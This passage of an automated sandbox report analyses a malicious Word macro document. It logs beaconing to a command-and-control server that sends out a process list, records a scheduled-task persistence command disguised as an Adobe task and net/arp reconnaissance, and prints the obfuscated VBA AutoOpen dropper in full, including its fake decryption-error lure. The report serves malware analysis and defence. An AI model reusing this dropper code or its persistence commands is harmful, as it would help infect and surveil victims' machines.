2017-11-09 13:02:07 UTC	49170	443	192.168.1.16	85.93.2.148	Data Raw: 65 72 73 69 6f 6e 3d 31 2e 30 2e 38 26 62 69 64 3d 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 26 67 72 6f 75 70 3d 73 61 6e 74 69 26 6b 65 79 3d 65 65 39 35 39 31 64 64 38 38 39 33 26 Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&	0
2017-11-09 13:02:09 UTC	443	49170	85.93.2.148	192.168.1.16	HTTP/1.1 200 OK Server: nginx/1.10.2 Date: Thu, 09 Nov 2017 13:02:09 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 16 Connection: close X-Powered-By: PHP/5.4.16	0
2017-11-09 13:02:09 UTC	443	49170	85.93.2.148	192.168.1.16	Data Raw: 67 65 74 5f 70 72 6f 63 65 73 73 5f 6c 69 73 74 Data Ascii: get_process_list	0
2017-11-09 13:02:10 UTC	49171	443	192.168.1.16	85.93.2.148	POST /?page=get_process_list HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded; Charset=UTF-8 Accept: / Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 668 Host: 85.93.2.148	0
2017-11-09 13:02:10 UTC	49171	443	192.168.1.16	85.93.2.148	Data Raw: 76 Data Ascii: v	0
2017-11-09 13:02:10 UTC	49171	443	192.168.1.16	85.93.2.148	Data Raw: 65 72 73 69 6f 6e 3d 31 2e 30 2e 38 26 62 69 64 3d 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 26 67 72 6f 75 70 3d 73 61 6e 74 69 26 6b 65 79 3d 65 65 39 35 39 31 64 64 38 38 39 33 26 69 6e 66 6f 3d 53 79 73 74 65 6d 20 49 64 6c 65 20 50 72 6f 63 65 73 73 2a 30 7c 53 79 73 74 65 6d 2a 34 7c 73 6d 73 73 2e 65 78 65 2a 32 30 30 7c 63 73 72 73 73 2e 65 78 65 2a 32 37 36 7c 77 69 6e 69 6e 69 74 2e 65 78 65 2a 33 31 32 7c 63 73 72 73 73 2e 65 78 65 2a 33 32 30 7c 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 2a 33 34 38 7c 73 65 72 76 69 63 65 73 2e 65 78 65 2a 34 30 34 7c 6c 73 61 73 73 2e 65 78 65 2a 34 32 30 7c 6c 73 6d 2e 65 78 65 2a 34 32 38 7c 73 76 63 68 6f 73 74 2e 65 78 65 2a 35 33 36 7c 73 76 63 68 6f 73 74 2e 65 78 65 2a 36 30 30 7c 73 76 63 Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&info=System Idle Process0\|System4\|smss.exe200\|csrss.exe276\|wininit.exe312\|csrss.exe320\|winlogon.exe348\|services.exe404\|lsass.exe420\|lsm.exe428\|svchost.exe536\|svchost.exe600\|svc	0
2017-11-09 13:02:12 UTC	443	49171	85.93.2.148	192.168.1.16	HTTP/1.1 200 OK Server: nginx/1.10.2 Date: Thu, 09 Nov 2017 13:02:12 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 2 Connection: close X-Powered-By: PHP/5.4.16	0
2017-11-09 13:02:12 UTC	443	49171	85.93.2.148	192.168.1.16	Data Raw: 6f 6b Data Ascii: ok	0

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 3440 Parent PID: 3020

General

Start time:	14:00:53
Start date:	09/11/2017
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\adjusted_records.doc
Imagebase:	0x77390000
File size:	1423008 bytes
MD5 hash:	5D798FF0BE2A8970D932568068ACFD9D
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 3512 Parent PID: 3440

General

Start time:	14:01:02
Start date:	09/11/2017
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c wscript.exe //b /e:jscript C:\Users\user~1\AppData\Local\Temp\crashpad.ini
Imagebase:	0x77390000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: wscript.exe PID: 3540 Parent PID: 3512

General

Start time:	14:01:03
Start date:	09/11/2017
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	wscript.exe //b /e:jscript C:\Users\user~1\AppData\Local\Temp\crashpad.ini
Imagebase:	0x75300000
File size:	141824 bytes
MD5 hash:	979D74799EA6C8B8167869A68DF5204A
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: schtasks.exe PID: 3600 Parent PID: 3540

General

Start time:	14:01:04
Start date:	09/11/2017
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\schtasks.exe' /Create /f /tn 'Adobe Acrobat Player Task' /tr 'wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log' /sc minute /mo 1
Imagebase:	0x75440000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: taskeng.exe PID: 3628 Parent PID: 836

General

Start time:	14:02:00
Start date:	09/11/2017
Path:	C:\Windows\System32\taskeng.exe
Wow64 process (32bit):	false
Commandline:	taskeng.exe {6C8EBD0A-6843-4E76-AA78-1A12EAE50432} S-1-5-21-312302014-279660585-3511680526-1004:computer\user:Interactive:[1]
Imagebase:	0x772c0000
File size:	192000 bytes
MD5 hash:	4F2659160AFCCA990305816946F69407
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: wscript.exe PID: 3664 Parent PID: 3628

General

Start time:	14:02:00
Start date:	09/11/2017
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log
Imagebase:	0x76f10000
File size:	141824 bytes
MD5 hash:	979D74799EA6C8B8167869A68DF5204A
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 3732 Parent PID: 3540

General

Start time:	14:02:03
Start date:	09/11/2017
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\cmd.exe' /c 'net view > C:\Users\user~1\AppData\Local\Temp\main.xml'
Imagebase:	0x75440000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: net.exe PID: 3756 Parent PID: 3732

General

Start time:	14:02:03
Start date:	09/11/2017
Path:	C:\Windows\System32\net.exe
Wow64 process (32bit):	false
Commandline:	net view
Imagebase:	0x612d0000
File size:	46080 bytes
MD5 hash:	B9A4DAC2192FD78CDA097BFA79F6E7B2
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 3772 Parent PID: 3664

General

Start time:	14:02:05
Start date:	09/11/2017
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\cmd.exe' /c 'net view > C:\Users\user~1\AppData\Local\Temp\main.xml'
Imagebase:	0x75440000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 3884 Parent PID: 3540

General

Start time:	14:02:33
Start date:	09/11/2017
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\cmd.exe' /c 'arp -a > C:\Users\user~1\AppData\Local\Temp\Themes453.xml'
Imagebase:	0x75440000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: ARP.EXE PID: 3908 Parent PID: 3884

General

Start time:	14:02:33
Start date:	09/11/2017
Path:	C:\Windows\System32\ARP.EXE
Wow64 process (32bit):	false
Commandline:	arp -a
Imagebase:	0x772c0000
File size:	20992 bytes
MD5 hash:	ADC7AD3C261D2753CB7A2FE73A66C210
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 3928 Parent PID: 3664

General

Start time:	14:02:35
Start date:	09/11/2017
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\cmd.exe' /c 'arp -a > C:\Users\user~1\AppData\Local\Temp\Themes546.xml'
Imagebase:	0x77390000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: ARP.EXE PID: 3952 Parent PID: 3928

General

Start time:	14:02:36
Start date:	09/11/2017
Path:	C:\Windows\System32\ARP.EXE
Wow64 process (32bit):	false
Commandline:	arp -a
Imagebase:	0x75440000
File size:	20992 bytes
MD5 hash:	ADC7AD3C261D2753CB7A2FE73A66C210
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: wscript.exe PID: 4040 Parent PID: 3628

General

Start time:	14:03:00
Start date:	09/11/2017
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log
Imagebase:	0x75620000
File size:	141824 bytes
MD5 hash:	979D74799EA6C8B8167869A68DF5204A
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: ThisDocument

Declaration

Line	Content
1	Attribute VB_Name = "ThisDocument"
2	Attribute VB_Base = "1Normal.ThisDocument"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = True
8	Attribute VB_Customizable = True
9	Private Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds as Long)

Executed Functions

Subroutine armando, APIs: 10, Strings: 7, Number of lines: 26, Relevance: 44.026

APIs	Meta Information
CreateObject	CreateObject("Scripting.FileSystemObject")
GetSpecialFolder
StrReverse	StrReverse("ini.daphsarc\") -> \crashpad.ini
Label1
OpenTextFile
Split
WriteLine
Close
Shell	Shell("cmd.exe /c wscript.exe //b /e:jscript C:\Users\user~1\AppData\Local\Temp\crashpad.ini",False) -> 3512
MsgBox

Strings	Decrypted Strings
"Scripting.FileSystemObject"
"\|*\|"
"d.exe /c wsc"
"ript.exe //b /e:jsc"
"ript "
"c"
"Decryption failed! Try again"

Line	Instruction	Meta Information
11	Sub armando()
12	Dim ikgygke	executed
13	Dim pbopegh
14	Dim vbspbopegh
15	Dim kuqa
16	Dim knyvlaql
17	Dim agluksad
18	Dim dacxitj
19	Dim ivwubka
20	Set avfasci = CreateObject("Scripting.FileSystemObject")	CreateObject("Scripting.FileSystemObject") executed
21	Set icrobbab = avfasci.GetSpecialFolder(2)	GetSpecialFolder
22	ikgygke = icrobbab & StrReverse("ini.daphsarc\")	StrReverse("ini.daphsarc\") -> \crashpad.ini executed
23	vbspbopegh = UserForm1.Label1.Caption	Label1
24	Set ygtekra = avfasci.OpenTextFile(ikgygke, 2, True)	OpenTextFile
25	For Each one in Split(vbspbopegh, "\|*\|")	Split
26	ygtekra.WriteLine one	WriteLine
27	Next one	Split
28	ygtekra.Close	Close
29	kuqa = "d.exe /c wsc"
30	knyvlaql = "ript.exe //b /e:jsc"
31	agluksad = "ript "
32	dacxitj = "c"
33	ivwubka = dacxitj & "m" & kuqa & knyvlaql & agluksad & ikgygke
34	Shell ivwubka, False	Shell("cmd.exe /c wscript.exe //b /e:jscript C:\Users\user~1\AppData\Local\Temp\crashpad.ini",False) -> 3512 executed
35	MsgBox "Decryption failed! Try again"	MsgBox
36	End Sub

Subroutine AutoOpen, APIs: 10, Strings: 0, Number of lines: 3, Relevance: 16.503

APIs	Meta Information
Part of subcall function armando@ThisDocument: CreateObject
Part of subcall function armando@ThisDocument: GetSpecialFolder
Part of subcall function armando@ThisDocument: StrReverse
Part of subcall function armando@ThisDocument: Label1
Part of subcall function armando@ThisDocument: OpenTextFile
Part of subcall function armando@ThisDocument: Split
Part of subcall function armando@ThisDocument: WriteLine
Part of subcall function armando@ThisDocument: Close
Part of subcall function armando@ThisDocument: Shell
Part of subcall function armando@ThisDocument: MsgBox

Line	Instruction	Meta Information
37	Sub AutoOpen()
38	armando	executed
39	End Sub

Module: UserForm1

Declaration

Line	Content
1	Attribute VB_Name = "UserForm1"
2	Attribute VB_Base = "0{6B6BF1FB-AD60-430D-9A4A-863E0DAD35DE}{CE2C7631-6144-406D-97FA-AA4F3584AE8A}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = False
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = False

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Signature Overview

Software Vulnerabilities:

Networking:

Boot Survival:

Stealing of Sensitive Information:

Persistence and Installation Behavior:

Spreading:

System Summary:

HIPS / PFW / Operating System Protection Evasion:

Anti Debugging:

Malware Analysis System Evasion:

Hooking and other Techniques for Hiding and Protection:

Language, Device and Operating System Detection:

Behavior Graph

Simulations

Behavior and APIs

Antivirus Detection

Initial Sample

Dropped Files

Domains

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Screenshot

Startup

Created / dropped Files

Contacted Domains/Contacted IPs

Contacted Domains

Contacted IPs

Static File Info

General

File Icon

Static OLE Info

General

OLE File "adjusted_records.doc"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: ThisDocument.cls, Stream Size: 3135

General

VBA Code Keywords

VBA Code

VBA File Name: UserForm1.frm, Stream Size: 1331

General

VBA Code Keywords

VBA Code

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 114

General

Stream Path: \x5DocumentSummaryInformation, File Type: Unicode text, UTF-32, big-endian, Stream Size: 4096

General

Stream Path: \x5SummaryInformation, File Type: Unicode text, UTF-32, big-endian, Stream Size: 4096

General

Stream Path: 1Table, File Type: data, Stream Size: 6949

General

Stream Path: Data, File Type: data, Stream Size: 393799

General

Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF, CR line terminators, Stream Size: 492

General

Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 71

General

Stream Path: Macros/UserForm1/\x1CompObj, File Type: data, Stream Size: 97